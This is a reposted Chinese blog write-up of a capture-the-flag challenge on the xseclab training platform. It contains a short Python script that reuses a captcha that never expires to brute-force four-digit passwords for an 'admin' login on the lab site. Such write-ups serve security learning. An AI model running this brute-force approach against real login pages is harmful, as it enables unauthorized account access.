网络信息安全攻防学习平台

其他 2018-10-22 18:59:24 阅读次数: 0
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/sinat_20454165/article/details/69945219
分值: 100

逗比的验证码,有没有难道不一样吗? 

通关地址

从网页的信息来看应该是要暴力破解的,但是对于基础题来说,识别验证码是比较过于复杂的方法。验证码与cookies应该是绑定的,但不会失效,如果看了下一题的话应该能够得到些提示。

import requests

url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"

sess = requests.Session()
res = sess.get(url)
res.encoding = "utf-8"
print(res.text)
vcode = input("vcode:")

for p in range(1000,10000):
    pwd = p
    data = {"username": "admin", "pwd": pwd, "vcode":vcode}
    print("trying password: %s" % pwd, end="\r")
    res = sess.post("http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php", data=data)
    res.encoding = "utf-8"
    print("\n", res.content)
    if "error" not in res.text:
        print(pwd)
        break

因为没有识别验证码,所以需要把第一请求获得的图片地址输入到浏览器中,然后人工输入验证码,再进行暴力破解

猜你喜欢

转载自blog.csdn.net/sinat_20454165/article/details/69945219
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
周排行
Python环境安装与基础语法(1)——计算机基础知识
IMU预积分
ADAS中的LDW、FCW、BSD、LCA、ACC、AEB、APA、DMS代表的含义
B站笔试两道题
skyeye arm 硬件虚拟机环境的搭建
Web前端静态页面示例
数组-合并排序数组 II-简单
springcloud之版本问题启动报错
面向对象-------------匿名对象(六)
输入URL到页面呈现中间发生了什么?
每日归档
更多
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022